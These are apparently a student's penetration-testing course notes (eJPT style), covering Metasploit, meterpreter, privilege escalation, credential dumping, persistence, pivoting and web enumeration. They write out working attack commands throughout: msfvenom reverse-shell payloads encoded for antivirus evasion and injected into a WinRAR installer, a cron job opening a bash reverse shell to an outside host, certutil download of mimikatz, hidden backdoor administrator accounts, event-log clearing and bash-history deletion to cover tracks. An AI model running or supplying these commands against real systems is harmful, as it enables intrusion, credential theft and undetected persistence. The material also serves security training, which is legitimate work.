- MySQL utilizes TCP port 3306 by default
- search type:auxiliary name:mysql
- mysql_version
- mysql_login
- mysqk_enum (simple enumeration with username and password specified)
- mysql_sql (interacting with sql)
- mysql_schemadump
- mysql_hashdump
- mysql_writable_dirs
- search type:auxiliary name:ssh
- ssh_version
- ssh_login
- ssh_enumusers
- SMTP uses TCP 25 by default and can also be configured to run on port 465 and 587
- seach type:auxiliary name:smtp
- smtp_version
- smtp_enum
-
We are looking for Metasploit Exploit modules to find vulnerabilities or misconfigurations on a system.
-
Nessus scans can be integrated in MSF
-
start a service scan with db_nmap -sS -sV -O x.x.x.x/xx
-
All results will be added to the nmap database
-
type "hosts" or "services" to see the results
-
with the results of the "services", you can type "search type:exploit name:<>
-
we can also use searchsploit which brings up exploits available at exploit-dn. You can limit the results to only show msf exploits
-
github "metasploit-autopwn" repo searches the msf db (Download and move it to the plugins directory and in msf type "load db_autopwn")
- Nessus automates the process of identifying vulnerabilities and also provides us with further information such as the corresponding cve code
- We used nessus essentials (limited to 16 ip's)
- Skipped this course (i'll try that myself..)
- load wmap
- Add a site (ip) with wmap_sites -a x.x.x.x
- Add a target url with wmap_targets -t http://x.x.x.x
- wmap_run -t (this shows all available msf modules)
- wmap_run -e (perform the vulnerability check)
-
A client-side attack is an attack vector that involves coercing a client to execute a malicious payload on their system that consequently connects back to the attacker when executed
-
Client-side attacks typically utilize various social engineering techniques like generationg malicious documents or portable executables (PEs)
-
Given this vector involves transferring a malicious payload to the client, we need to be aware of AV detection!
-
we will use msfvenom as a payload generator! we will focus on a meterpreter payload...
-
when specifying a payload with msfvenom, we usually start with the operating system, the architecture and then the protocol to connect back
-
staged payload uses "/" between meterpreter and protocol, "_" between meterpreter and protocol is a non-staged payload!
-
e.g. windows/x64/meterpreter/reverse_tcp is a staged payload
-
e.g. windows/x64/meterpreter_reverse_tcp is a non-staged payload
-
to generate a payload with msfvenm, you usually have to specify this:
- msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f exe > /home/felix/Desktop/payloadx86.exe
- this generates a payload for a 32-bit windows machine with the output format exe that connects back to x.x.x.x on port 1234
-
before you run this payload, set up the msf multi/handler module!! AND SET THE RIGHT PAYLOAD TYPE!
- encoding helps to avoid signature av detection!
- x86/shikata_ga_nai encoder for windows and linux executables is excellent! (this will work on 64 and 32 bit!)
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -e x86/shikata_ga_nai -f exe > /home/felix/encoded.exe
- you can do more iterations of encoding by specifying "-i 10" (after LPORT)
- we can utilize the msfvenom -x option to inject it into an legitimate portable executable (e.g. winrar) (use the -k option also to maintain the functionality!
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -e x86/shikata_ga_nai -i 10 -f exe -x /home/felix/downlaods/winrar602.exe > /home/felix/winrar_injected.exe
- Metasploit resource scripts are a great feature of MSF that allow you to automate repetitive tasks and commands
- quite similar to batch scripts where you can specify a set of msfconsole commands that you want to execute sequentially
- skipped this.. read a manual to create resource scripts. :)
- HTTP File Server (HFS) is a web server that is designed for file & document sharing
- Rejetto HFS is a popular HTTP File Server and Rejetto HFS V2.3 is vulnerable to a remote command execution attack!
- search for "rejetto"
- was used in the WannaCry Ransomware Attack!
- Affects multiple Windows Versions from Windows Vista to 10
- The Vulnerability exists in SMBv1
- Tomcat is a popular and open source Java servlet web server
- Apache Tomcat Webserver is primarily used to host dynamic websites or web applications developed in java
- Apache Tomcat V8.5.19 or below is vulnerable to a remote code execution
- TRY THIS: exploit/multi/http/tomcat_jsp_upload_bypass
- vsftpd is a FTP server for Unix-Like systems and is the default FTP server for Ubuntu, CentOS and Fedora
- vsftpd V2.3.4 is vulnerable to a command execution vulnerability
- Samba is the Linux implementation of SMB and allows Windows systems to access Linux shares and devices.
- Samba V3.5.0 is vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared libary to a writeable share, and then cause the server to load and execute it.
- libssh V0.6.0 - 0.8.0 is vulnerable to an authentication bypass
- search for libssh
- show the options and set the spawn_pty to true to spawn an interactive session
- smtp server haraka (plugin) prior to V2.8.9 is vulnerable to a command injection.
- set the payload to linux/x64/meterpreter_reverse_http
- fill out the other necessary options and exploit it.
-
The Meterpreter (Meta-Interpreter) payload is an advanced multi-functional payload that operates via DLL injection and is executed in memory on the target system, consequently making it difficult to detect
-
It communicates over a stager socket and provides an attacker with an interactive command interpreter on the target system that facilitates the execution of system commands, file system navigation, keylogging and much more
-
Meterpreter also allows us to load custom script and plugins dynamically
-
MSF provides us with various types of meterpreter payloads that can be used based on the target environment and the OS architecture.
-
Useful Meterpreter commands:
-
sysinfo
-
getuid -> current permissions
-
help (show up the help menu)
-
Windows Meterpeter has some more advanced features such as keylogging and credential dumping
-
-
exit a meterpreter session: exit
-
background a session: background (or strg + z)
-
sessions (show active sessions)
-
sessions -h -> get help
-
search for files: search -d /usr/bin -f backdoor or search -f *.jpg
- background the open shell session
- use post/multi/manage/shell_to_meterpreter
- fill options (SESSION) and run!
- or you can use sessions -u to upgrade a command shell to meterpreter automatically
-
MSF provides us with various post exploitation modules to:
- Enumerate user privs
- Enumerate logged on users
- VM Check
- Enumerate installed programs
- Enumerate AVs
- Enumerate computers connected to a domain
- Enumerate installed patches
- Enumerate shares
-
getuid -> show user
-
getsystem -> try elevate to system privs
-
migrate -> migrate meterpreter to another process
- we can also use post/windows/manage/migrate
-
search checkvm -> check if target is a vm
-
search enum_applications -> enumerate all installed applications
-
search type:post platform:windows enum_av -> Check which av is installed and if some folders are excluded
-
search enum_computers -> enumerate computers in a domain
-
search enum_patches -> IMPORTANT! -> Enumerate Patches
-
UAC is a Windows Security Feature introduced with Windows Vista.
-
UAC is used to ensure that changes to the os require approval from the administrator
-
We can utilize "Windows Escalate UAC Protection Bypass (In Memory Injection)" module to bypass UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.
-
meterpreter shell is required! (x64 bit Version required!)
-
use exploit/windows/local/bypassuac_injection -> can be used to bypass uac
- set the payload to windows/x64/meterpreter/reverse_tcp
- show options and fill out (maybe we need to adjust the target to x64 (type set TARGET to autocomplete))
COMMON ERRORMESSAGE IN PAYLOADS: Exploit failed: RuntimeError The EXE generator now has a max size of 4096 bytes, please fix the calling module
THIS MEANS THAT THE PAYLOAD IS TO BIG (STAGELESS), USE A STAGED PAYLOAD!
- The following priveleges are required for a successfull impersonaltion attack
- SeAssignPrimaryToken: This allows a user to impersonate tokens
- SeCreateToken: This allows a user to create an arbitary token with administrative privileges
- SeImpersonatePrivilege: This allows a user to create a process under the security context of another user typically with administrative privileges (DAS BRAUCHEN WIR AUF JEDEN FALL!)
- Incognito is a built-in meterpreter module that was originally standalone that allow you to impersonate tokens after successful exploitation
- The SAM (Security Account Manager) database, is a database file on windows systems that stores users passwords and can be used to authenticate users both locally and remotely.
- We can utilize pre-built mimikatz executable, alternatively, if we have a ccess to a meterpreter session on a windows target, we can use the inbuilt meterpreter extension called "Kiwi"
- Kiwi allows us to dynamically execute Mimikatz on the target system without touching the disk. (Im Memory)
- capturing or harvesting NTLM hashes or cleartext passwords to authenticate with the target
- dump the hashes via a meterpreter session
- use the "exploit/windows/smb/psexec" and specify SMBUSER with the Username and SMBPASS with the NTLM Hash (or a valid password) to get a shell.
- search for: platform:windows persistence -> you will find a lot of mudules.
- a good choice is persistence_service
- RDP is disabled by default
- we can use a msf module to enable it
- RDP authentication need a legitmate username and password (clear text!)
- post/windows/manage/enable_rdp is the module name
- use xfreerdp /u:administrator /p:<> /v:<> to connect from a linux client.
- works best when migrated to the explorer.exe process!
- start the keylogger directly from meterpreter -> keyscan_start, keyscan_stop, keyscan_dump
- from a meterpreter session run "clearev" to completely erase all events
-
using a compromised host to exploit other host on the internal network
-
from a meterpreter session, you can run:
- "run autoroute -s x.x.x.x/xx" to add a route to another subnet that is connected to the compromised host
-
from there we can interact with this subnet over the compromised host.
-
we'll need to setup portforwarding on the first victim, because we need to interact with victim 2 over victim 1.
- in meterpreter: portfwd add -l 1234 -p <rem. port> -r
- db_nmap -sV -sC -p 1234 localhost
-
to exploit another machine we'll need the bind_tcp meterpreter payload (NOT reverse_tcp)!!!
- used module: is_known_pipename (samba exploit) (This module exploits Samba from versions 3.5.0-4.4.14, 4.5.10, and 4.6.4 by loading a malicious shared library.)
- used commands to explore the system:
- sysinfo
- getuid (if uid=0 -> root)
- type "shell" and type /bin/bash -i to spawn a bash shell
- cat /etc/*issue -> enumerate Linux Version
- uname -r -> kernel version
- Use post exploit modules
- search enum_configs (get all config files)
- post/multi/gather/env Linux & Kernel Version
- enum_network -> collect all network information
- get your enumerated data with the "loot" command
- enum_protections -> Check security systems used.
- stored in "notes" (type "notes")
- enum_system -> gather system and user information
- checkcontainer -> Check if we're in a container (e.g. docker)
- checkvm - Check if this is a VM
- enum_users_history -> gather the user history (bash history file)
- get a session and upgrade it with sessions -u x
- i've check the enum_protections module and find out there was a software called "CHKROOTKIT" that is vulnerable to a priv esc. vulnerability
- Linux User Account hashes are stored in /etc/shadow.
- We need to have root privs to read or this file to do further cracking (with John the Ripper)
- obtain a meterpreter session (in this case: is_known_pipename (samba)
following commands were used:
- post/multi/gather/ssh_creds
- post/multi/gather/docker_creds
- post/linux/gather/hashdump
- post/linux/gather/ecryptfs_creds
- post/linux/gather/enum_psk
- post/linux/gather/enum_xchat
- post/linux/gather/phpmyadmin_credsteal
- post/linux/gather/pptpd_chap_secrets
- post/linux/manage/sshkey_persistence
-
add a user for backdoor access with a service name
- useradd -m ftp -s /bin/bash
- passwird ftp
- add to root group: usermod -aG root ftp
- usermod -u 15 ftp (used to modify the userid, that it looks that the user has not been added a few minutes ago.)
-
search platform:linux persistence (we've testet the apt_package_manager_persistence and cron_persistence, but there are a few others)
-
be aware, that a cronjob persistence mechanism can easily be detected by sysadmins!!!
-
sshkey_persistence is a good way to establish persistence (difficult to detect)
- GUI Interface with all msfconsole controls
- No further notes.
- Penetration Testing Execution Standard: is a pentesting methodology that was developed by a team of infosec practitioners with the aim of addressing the need for a comprehensive and up-to-date standard for pentesting
- http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
- Identifing Services and we need to find out the Service Version to check if an application is vulnerable
- Banner Grabbing is an information gathering technique
- Banner GRabbing can be performed with:
- Performing a service version detection scan with NMAP (e.g.: nmap -sV -O x.x.x.x)
- grab a banner with --script=banner (should be the same with the service version detection, but can be used if -sV fails)
- Connecting to the Port with Netcat (nc)
- nc x.x.x.x port (e.g. nc 192.168.1.2 22)
- Authenticationg with the service (if the service supports authentication), for example SSH, FTP, Telnet etc.
- ssh test@x.x.x.x (you dont need valid credentials, sometimes you get the version)
- Performing a service version detection scan with NMAP (e.g.: nmap -sV -O x.x.x.x)
- nmap scripts are normally stored in: /usr/share/namp/scripts
- use grep to limit the results to a protocol, e.g. ls /usr/share/nmap/scripts/ | grep http
- specify a script by: nmap -sV --script=http-enum x.x.x.x -p 80
- get a list of vulnerability detection scripts: ls /usr/share/nmap/scripts/ | grep vuln
- normally perform an nmap scan (with Version detection option enabled (sV) and then use the "search" command to find some auxiliary modules to perform some futher scanning. If you find a vulnerability, search for corresponding exploits.
- Exploit code can be found online, but it is crucial to check the source code when downloading and running exploits from unknown sources!!
- trusted sources are:
- exploit-db https://www.exploit-db.com/ (Check "verified" to only show veryfied exploit code)
- rapid7 https://www.rapid7.com/db/ (all exploits found here are included in metasploit) (search is not very good on this page)
- use google dorks
- vsfpd 2.3.4 site:exploit-db.com
- ...
- PacketStormSecurity https://packetstormsecurity.com/ is also a good source.
- Find exploits
- get Vulnerability notes
- TOOLS
- If you dont have access to online databases, you can use searchsploit
- Kali comes (pre-Packaged) with all exploit-db exploits offline!
- SearchSploit is used to search through all exploits
- the package is called "exploitdb" (apt-get install exploitdb)
- default path: /usr/share/exploitdb
- usage: searchsploit
- use searchsploit -m to copy the exploit to the current working directory
- search terms:
- c (case sensetive)
- t (title search; search only through the title)
- e (exact search; exactly what you've specified); e.g. searchsploit -e "OpenSSH 7.2"
- w (display the exploit-db URL instead of the EDBID)
- filters:
- searchsploit remote windows smb (search for all remote exploits, with windows as a platform that target SMB)
-
In some cases, exploit code will be developed in C / C++ or C#, as a result, you will need to compile the exploit code into a PE (Portable Executable) or binary.
-
As a Pentester, you must be able to compile exploit code developed in C.
-
To compile windows c exploits on linux, we need some tools:
- MinGW-w64 (install it by: sudo apt-get install mingw-w64)
- GNU C compiler (sudo apt-get install gcc)
-
For Windows:
- i686-w64-mingw32-gcc 9303.c -o exploit (This compiles an exploit written in c for windows (64-bit)
- i686-w64-mingw32-gcc 9303.c -o exploit -lws2_32 (compile a 32 bit executable)
-
For linux:
- read the compile instructions from the exploit or use gcc.
-
Netcat is a networking utility used to read and write data to network connections using TCP or UDP.
-
Is available for UNIX and Windows OS
-
Is used to:
- Banner Grabbing
- Port Scanning
- Transferring Files
- Bind / Reverse Shells
-
Use "nc --help" or "man nc" to get a brief introduction to netcat
- "-l" listen option
- "-n" nodns (do not resolve hostnames)
- "-v" verbose level
-
Port Scanning / Connect to Ports / Banner Grabbing:
- nc -nv x.x.x.x xx (TCP)
- nc -nvu x.x.x.x xx (UDP)
-
Start a listener
- nc -nlvp 4444 (opens up a port on tcp 4444 on the localhost)
- nc -nlvup 4444 (opens up a port on udp 4444 on the localhost)
-
Download a file
- On the target (Windows): "nc.exe -nlvp 1234 [smaller sign] test.txt"
- On the attacker side (Linux): "nc -nv x.x.x.x 1234 [greater sign] test.txt
- Why are reverse shells better in general?
- First, we need to setup a netcat listener on the target (how do we do that when we dont have access to the system?)
- Second, it's INBOUND traffic (from the target perspective)!! It will likely be blocked by the firewall of the target system.
- With a reverse shell, the roles are switched!
- To build a bind shell, just use the commands mentioned above
- It is the opposite of bind shells and the roles are switched.
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
- www.revshells.com
(Nothing new)
-
is a pure PowerShell exploitation/post-exploitation framework
-
it allows to run PowerShell agents without needing powershell.exe
-
it has modules from keyloggers, detection evasion, priv esc. to hashdumping...
-
Maintaned by Kali Linux
-
PowerShell-Empire is primarily designed for windows targets and specialized on exploitation / post-exploitation
-
Can alsom be seen as a C2 Server for Windows targets.
-
Starkiller is a GUI Frontend for PowerShell Empire
-
Install it:
- sudo apt-get install powershell-empire starkiller -y
-
Starup the PowerShell Empire server
- sudo powershell-empire server
- default Port (RestAPI): 1337 (used by starkiller)
-
In another tab, start: sudo powershell-empire client
- starts the client to interact with empire
-
For all other things read the documentation... it's not needed for this course.
- A Black Box Penetration test is a security assessment whereby the penetration tester is not provided with any information regarding the target system or network (No IP ranges etc.)
- The approack is very useful as it demonstrates how an external attacker with no inside knowledge would compromise your machines.
-
Perform a basic Sevice version detection scan: nmap -sV x.x.x.x
-
nmap -T4 -PA -sC -sV -p 1-10000 x.x.x.x -oX nmap_10k (more comprehensive scan, XML Output)
-
import an XML output to msf: db_import /root/Desktop/nmap_10k
-
also a good way to scan any port: nmap -sV -sC -Pn -T4 -p- 10.2.24.51 -oX nmap-full
- enum4linux
- smb_enumusers (msf)
- hydra
AFTER WE HAVE LEGITIMATE CREDENTIALS FOR SMB, WE CAN GET A SHELL WITH PSEXEC.py OR MSF:
- locate psexec.py
- we can use this script to remotly connect to a target via SMB
- copy the py script to a working directory (e.g. desktop) and make it executable (chmod +x psexec.py) and run it with python3
- python3 psexec.py Administrator@x.x.x.x
- we can also perform this with msf: auxiliary/scanner/smb/psexec
- nmap -sV -sC -p 3306, 8585 x.x.x.x (8585 WAMP Server for phpmyadmin, may be different!)
- use auxiliary/scanner/mysql/mysql_login (brute force)
- To connect: mysql -u root -p -h x.x.x.x
- The same as above just with Linux.
- If smtp is running on the target (port 25), it is very easy to obtain a list of users that we can target:
- msf - smtp_enum module will do that for you.
- use searchsploit too, don't rely only on metasploit!
- In the "targeting php" excercise, we've focused on specific versions of php (5.2.x) and they are vulnerable to a php cgi exploit.
- check if the phpinfo.php file exists and is accessable.
- whenever targeting smb or samba, use smb_version msf module to enumerate the exact Version!
- we used the "usermap_script" to exploit samba on a lab. The target version was samba 3.0.20
-
Avoid AntiVirus (Signature Based) Detection with Shellter (Obfuscation & Encryption)
-
The use of shellter doesn't has a lab attatched, so i assume that is not part of the eJPT exam.
-
Obfuscating PowerShell Code:
- As a pentester, you'll be confornted with PS quite often and scripts will maybe flagged immediately as malicious.
- Invoke-Obfuscation is an open source Powershell v2+ command and script obfuscator (by daniel bohannon -> see GitHub)
- Clone this Repo locally
- We can run PS Scripts in Linux using the PowerShell Module, which comes pre-pachaged on Kali
- Sudo apt-get install powershell
- run it with "pwsh"
- Import-Module ./Invoke-Obfuscation.psd1
- Invoke-Obfuscation (This brings up the UI)
- The "AST" option works best on Windows 10
- Get a malicious script (e.g. a reverse shell) which you want to obfuscate
- SET SCRIPTPATH /home/kali...../shell.ps1
- AST
- ALL
- 1
-
Post Exploitation Framework:
-
Sometimes transferring files and upgrading shells is not neccessary
-
Local enumeration is very important for priviledge escalation!
-
What is the OS, whats the OS version?
-
Whats the Hostname?
-
OS Name
-
OS Build & Service Pack
-
OS Architecture (x64 / x86)
-
Installed updates / hotfixes
-
With Meterpreter:
- getuid -> Current User
- sysinfo -> Hostname, OS and OS Build, Architecture, Domain
-
With Windows Commands:
- hostname -> get the hostname
- systeminfo -> Hostname, OS Name, OS Version, Architecture, Default WinDir, Domain, DC Server, Hotfixes installed, Network Interfaces & IPs
- wmic qfe get Caption,Description,HotFixID,InstalledOn -> get additional information of updates
- C:\Windows\System32\eula.txt can also reveal important information
- meterpreter -> getuid -> get the user info (currently used)
- search "logged_on_users" msf module can tell which users are currently logged on
- Manually enumeration on windows:
- whoami -> current user + hostname
- whoami /priv -> current priviledges
- query user -> currently logged on users
- net users -> all accounts on the local system
- net user USERNAME -> futher information about a user
- net localgroup -> list all local groups on the system
- net localgroup administrators -> list all users in a group (e.g. administrators)
- ipconfig -> IPv4/6, Subnet Mask, Gateway, MAC, DNS, DHCP
- route print -> Routing table
- arp a -> Arp Table can list all devices on the network which the server/client had a connection to.
- netstat -ano -> see on which ports does applications on the server listen.
- netsh firewall show state OR netsh advfirewall firewall show -> See or configure the firewall rules etc.
- within a meterpreter session type "ps" to list all processes
- or use "pgrep explorer.exe" to find the PID of a given process
- migrate to antother proccess with "migrate xxxx" in meterpreter
Directly from a cmd you can use the following: - net start (services that are started) - wmic service list brief (list all services) - tasklist /SVC (list all running services and processes) - schtasks /query /fo LIST /v (list out all scheduled tasks)
- JAWS - Just Another Windows Enum Script (GitHub Repo by 411Hall)
- post exploit modules:
- win_privs
- enum_loggd_on_users
- checkvm
- enum_applications
- enum_computers
- enum_patches
- enum_shares
Run the JAWS Enum Script and output it into a txt-file:
- powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
- We are looking for:
- Hostname
- Distribution and distribution release version
- Kernel Version & Architecture
- CPU information
- Disk and mounted drives
- Installed Packages & software
Classic Meterpreter Commands for Enumeration on Linux - Sysinfo (Kernel and Architecture)
Bash / Shell Commands for Enumeration - hostname - cat /etc/issue -> Debian Release Version - cat /etc/*release -> more Release Information - uname -a -> Kernel Information & some more infos - env -> Environment variablew - lscpu -> CPU information - lsblk | grep sd -> show storage devices and availavle storage - dpkg -l -> see all packages / software installed on this machine
- meterpreter -> getuid -> when we see a uid=0 it means we are root.
- shell commands
- whomai -> get current username
- groups "username" tells you in which groups a user is.
- cat /etc/passwd -> get all users on the system. All service accounts should have "sbin:/usr/sbin/nologin"
- get all non-service user: cat /etc/passwd | grep -v /nologin
- ls /home -> all normal user accounts should have a folder here.
- currently loggedon users -> "who", "last", "lastlog" commands are useful to find recent users
- meterpreter
- ifconfig
- netstat (tcp and udp services are currently listening)
- route
- ip a s
- cat /etc/hostname
- cat /etc/hosts
- cat /etc/resolv.conf
- arp -a (if not installed: meterpreter session -> arp
- meterpreter
- ps (list all proccesses)
- pgrep xxx (grep a specific process)
- ps (list out processes)
- ps aux (includes more info e.g. user, cpu usage etc.)
- top (dynamic utitly of viewing processes)
- crontab -l -> Display the CronJobs for this user
- ls -al /etc/cron* -> list all cron jobs
- cat /etc/cron*
- LinEnum Tool on Github (rebootuser repository)
- Download and transfer the script to the target machine, make it executable (chmod +x) and run it
- meterpreter
- /linux/gather/enum_config -> Enumerates all config files of the machine
- /linux/gather/enum_network -> Gather all network information
- /linux/gather/enum_system -> enum system information
- /post/linux/gather/checkvm
- Python comes with a builin module SimpleHTTPServer (python2) and http.server (python3), that can be used to facilitate a simple HTTP Server that gives you standard GET and HEAD request handlers
- This Module can be used to host files in any directory on our machine.
- python 2
- switch to the directory which is hosting the files which you want to transfer
- python -m SimpleHTTPServer 80
- python3 -m http.server 80
- JUST A NOTE FOR ME: Some Exploits from ExploitDB etc. you'll need to run twice! For example the following exploit: 39161.py (rejetto exploit) AND in this case remember to start a webserver that's hosting nc.exe!!!!
- we can use the "certutil -urlcache -f http://x.x.x.x/mimikatz.exe mimikatz.exe" (In this example we are downloading mimikatz.exe from a python webserver)
- we can use tmux if we only have one shell and cannot create tabs! You can create new tabs (ctrl+b, then c) and switch tabs with ctrl+b number
- then we can use python to host a webserver on the source
- we can download a file using "wget http://x.x.x.x/backdoor.php"
- Easiest way to identify if it's a non-interactive shell is it won't provide a "prompt" (root@xxx:)
- bash session: /bin/bash -i
- remember: a bash shells doesn't need to be installed!!
- list all shells on the target: cat /etc/shells (you can choose one here, most common is "/bin/bash" or "bin/sh"
- check is python is installed: python --version
- spawn a python pty session: python -c 'import pty; pty.spawn("/bin/bash")'
- check if perl is installed: perl --help
- perl -e 'exec "/bin/bash";'
- check if ruby is installed
- ruby: exec "/bin/bash"
- One of the best PrivEsc Check Script: https://github.com/itm4n/PrivescCheck
- Go through the results and find possible escalation vectors.
- If you find valid credentials, you can maybe use psexcec to authenticate with the credentials found in the previous step.
- LinEnum Script can be used to identify vulnerabilities. In this section, we'll do it manually.
- cat /etc/passwd -> identify other users on the system
- groups -> groups we're in
- cat /etc/groups -> List all groups
- groups username -> list the groups a given user is a part of
- find / -not -type l -perm -o+w (find all files all users have write permissions on)
- look for files in the /etc/ directory. E.g. /etc/shadow -> this is really bad!!
- if the /etc/shadow file is writeable for everyone, we can use the openssl command to create an encryped password
- openssql passwd -1 -salt abc password
- copy the output
- paste it in the shadow file and replace the "*"
- https://gtfobins.github.io/
- sudo -l
- find suid permissions: find / -perm -u=s -type f 2>/dev/null
- metasploit
- search persistence_service (requires system or administrative privs.)
- specify the LPORT, SESSION and FIRE! :)
- This module will generate a payload, upload it to the target and make it persistent via a service
- when quitting the session and you want to reconnect to the target, remember to setup a multi/handler listener with the exact same payload specified and the LPORT specified.
-
when exploited, we can create a backdoor user account
-
metasploit
- "run getgui -e -u felix -p abc123_321"
- This command will do the following:
- See if RDP is enabled, if not, it will enable it (and set it to startup mode)
- Create a new user (the one we've specified)
- Add the User to the RDP Users
- Add the User to Administrator Group
- Hide the User from logon screen
- Open Neccessary Firewall Ports
-
we can user xfreerdp to connecto to the target
- xfreerdp /u:felix /p:abc123_312 /v:x.x.x.x
-
Linux Servers are typically accessed via ssh
-
In most cases, Linux servers will have key-based authentication enabled and we can use that key to access thy system.
-
Even if the user-account password is changed and you have the private key, you'll still be able to logon.
-
in the users home folder there is a .ssh folder. Here are the keys stored. We'll need to copy the private key.
-
For this, we can use scp. From the source machine, establish a connection: "scp felix@x.x.x.x:~/.ssh/id_rsa ."
-
If done, we can use the following ssh command to connect back with a certificate
- ssh -i id_rsa felix@x.x.x.x
-
You'll maybe need to adjust the permissions if they are too open (for example to 600 -> chmod 600 id_rsa)
-
Typically, you would create a keypair and upload the public key to the target and keep the private key on the hackers machine.
- Cron is a time-based service that runs applications, scripts and other commands at a fixed interval.
- Linux equivilent to Windows Sheduled Tasks
- cat /etc/cron* -> enumerate the CronJobs
- Create a cron-file: echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/1234 0>&1'" > cron
- Add the Cronjob crontab -i cron
- Check if added: crontab -l
- We've already talked about windows hashes.
- Windows OS stores hashes in SAM (Security Accounts Manager) database. (Hashed and stored here)
- Authentication and verification of user credentials is facilitated by the Local Security Authority (LSA)
- LM hashes is disabled since windows vista. From then, Microsoft is using NTLM
- Attackers typically utilize in-memory techniques and tools to dump SAM hashes from the LSASS process cache, because we cannot copy the SAM Database while the OS is running.
- NOTE: Elevated / Administrative privs are required in order to access and interact with the LSASS Process. (because its secured with a syskey)
- How to dump (tools)
- inbuild meterpreter "hashdump" command
- mimikatz
- We can crack the obtained hashes with:
- John the Ripper
- Hashcat
- All information for all accounts on Linux is stored in the passwd file located at /etc/passwd
- All the passwords for the users are encrypted in the shadow file. It can be found at /etc/shadow
- The shadow file can only be accessed and read by the root account (so we need elevated privs!)
- How are the encrypted passwords stored in the shadow file? Look at the number after the username encapsulated by the dollar symbol
- Value: $1 -> MD5, $2 -> Blowfish, $5 -> SHA-256, $6 -> SHA-512
- In most newer Distributions / Linux Versions, the standard hashing algo is SHA-512
- Crack the hashes with hashcat:
- Get Root Access
- Copy the Shadow entry which you want to crack (e.g. root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:18348:0:99999:7:::) into another file.
- In this case, we'll use the follwoing command to crack
- hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
- Or with john, we'll use:
- john --format=sha512crypt hashes.txt --worlist=rockyou.txt
- Pivoting is a post exploitation technique that involves utilizing a compromized host that is connected to multiple networks to gain access to systems within other networks.
- compromise the first machine and get a meterpreter shell. That's our starting point.
- check the ipconfig / ifconfig
- we'll need to add a route (run autoroute -s x.x.x.x/xx) (add the entire network)
- because we can only reach the second target over the route we've just created, we'll need to use the inbuild meterpreter portscanner module (tcp)
- search portscan
- in this case, we found port 80 is open. But it would be mouch better to perform a real nmap scan. so we can perform portforwarding
- within meterpreter session, run: portfwd add -l 1234 -p 80 -r x.x.x.x (That means we are portforwarding the remote (victim machine) port 80 to our local machine's port 1234
- we can now do the following: nmap -sv -p 1234 localhost (This will scan port 80 on target machine)
- If we identified a vulnerability (e.g. BadBlue), we can proceed within msfconsole)
- we used the payload /windows/meterpreter/bind_tcp
- set the RHOST to the target on the specified remote port (here 80) and exploit it
- The exploitation and post-exploit phases of a pentest involves actively engaging with target systems and the data that is stored in these systems
- We need to be able to clear our tracks and revert any changes that we've done (Defined in the Rules Of Engagement (ROE))
- A good practice is to store all your scripts, exploits and binaries in the C:\Temp (Windows) or the /tmp directory on Linux.
- Some well designed MSF modules provide you with instructions and resource scripts that provide you with informatioin regarding where the artifacts are stored and how they can be removed.
- Clearing Event Logs on Windows should be avoided in a pentest, because event logs are storing important data for some companies.
- if you select a module, you can open the advanced options by typing "show advanced" in a module.
- "show info" gives you an overview of the exploit.
- All the points mentioned above can maybe give you some idea what the exploit is doing and if it's placing some data on the system.
- IF YOU RUN AN EXPLOIT, ALWAYS NOTE DOWN IF A FILE IS BEEING PLACED ON THE TARGET! (see screenshot!)
- 
- Some Modules provide resource scripts (see screenshot)
- 
- we can cat out the content and see what its doing.
- How to use a resource script:
- open up the session (meterpreter)
- type: resource /path/to/RC-Script
- always store files which you've transferred in /tmp or create your own
- once the system will be restarted, the files will be lost!
- Cleaning up with resource scipts are the same as on windows. So just look above
- in the users home, there is typically a .bash_history file. (type history to display the history)
- delete specific / dangerous commands from the bash_history file to cover your tracks!
- Its all about manipulating humans
- Impersonation
- Pretexting
- Emotional Pull
- Urgency
- Free stuff
- Blackmail
- Quid pro quo
- Common Tactics
- Phishing
- Spear Phishing (Targeted Phishing)
- Whaling (Spear Phishing of high-value individuals)
- Smishing (SMS Phishing)
- Vishing (Voice Phishing)
- Watering Hole
- Baiting
- Physical Access
- Builiding your own campaign: GoPhish (https://getgophish.com/)
- Check the documentation on how to use it.
-
Directory busting with dirbuster. This gives you an overview of files / directories that exist on the webserver
-
dirb http://x.x.x.x
-
HTTP Methods with curl: Curl allows us to use more http methods then a normal webbrowser would do.
- find some useful curl methods here: https://everything.curl.dev/http/cheatsheet
- curl -X OPTIONS x.x.x.x -v
- upload somethin if you find a writeable directory: curl -T hello.txt http://target-1/uploads/
- delete a file: curl -X delete http://target-1/uploads/hello.txt
- It's very much like dirb but faster ;)
- gobuster dir -u http://x.x.x.x -w /usr/share/wordlists/xxx.txt (Use a wordlist to enumerate directories)
- gobuster dir -u http://x.x.x.x -w /usr/share/wordlists/xxx.txt -b 403, 404 (Error Codes 403 and 404 get silenced)
- gobuster dir -u http://x.x.x.x -w /usr/share/wordlists/xxx.txt -b 403, 404 -x .php,.xml,.txt -r (Additional enumerate some file types)
- we can catch a GET request with the proxy and use the intruder to perform a sniper attack. We can specify a wordlist and run the attack. Remember to add a variable in the payload positions.
- the free version / community edition is ultra slow. So when performing either buy it or use gobuster / dirb to enumerate directories and files!
- OWASP ZAP is very powerful. I'll take a seperate Class to dive in deeper. I don't think it's neccessary for the exam.
- Nikto does some automatic scans and is a good way to start WebApp Pentesting
- Nikto is a command line tool. Start it by typing "nikto" and it shows a short documentation.
- nikto -h http://x.x.x.x starts a basic enumeration of the given url
- nikto -h https://nmap.org -ssl (when you want to scan an https website, you'll have to use the -ssl option!)
- Manually crawling a web application
- If on the "Dashboard" Menu the "Live Passive Crawling Option is enabled, and we navigate around on the website, we can view the http history which is located at the "Proxy" Menu.
